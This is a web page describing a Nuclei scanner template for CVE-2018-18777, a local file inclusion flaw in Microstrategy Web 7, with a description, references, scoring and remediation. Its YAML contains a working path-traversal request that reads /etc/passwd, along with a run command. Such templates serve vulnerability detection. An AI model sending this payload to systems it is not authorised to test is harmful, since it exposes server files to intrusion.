Microstrategy Web 7 - Local File Inclusion
ID: CVE-2018-18777
Severity: medium
Author: 0x_Akoko
Tags: cve,cve2018,traversal,edb,packetstorm,microstrategy,lfi
Description
Section titled “Description”Microstrategy Web 7 is vulnerable to local file inclusion via “/WebMstr7/servlet/mstrWeb” (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
YAML Source
Section titled “YAML Source”id: CVE-2018-18777
info: name: Microstrategy Web 7 - Local File Inclusion author: 0x_Akoko severity: medium description: | Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a newer version of Microstrategy Web. reference: - https://www.exploit-db.com/exploits/45755 - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18777 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 epss-score: 0.00185 epss-percentile: 0.5564 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microstrategy product: microstrategy_web tags: cve,cve2018,traversal,edb,packetstorm,microstrategy,lfi
http: - method: GET path: - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a0046304402204b269ea2e3ad03c5b91308035709c4d7b4edbc7e04970b93347b40891f07fdcc022016658a1c4de0d6c893c22c54fed2b5fb7061c95bbe51ae28bfa70eb43a139566:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-18777.yaml"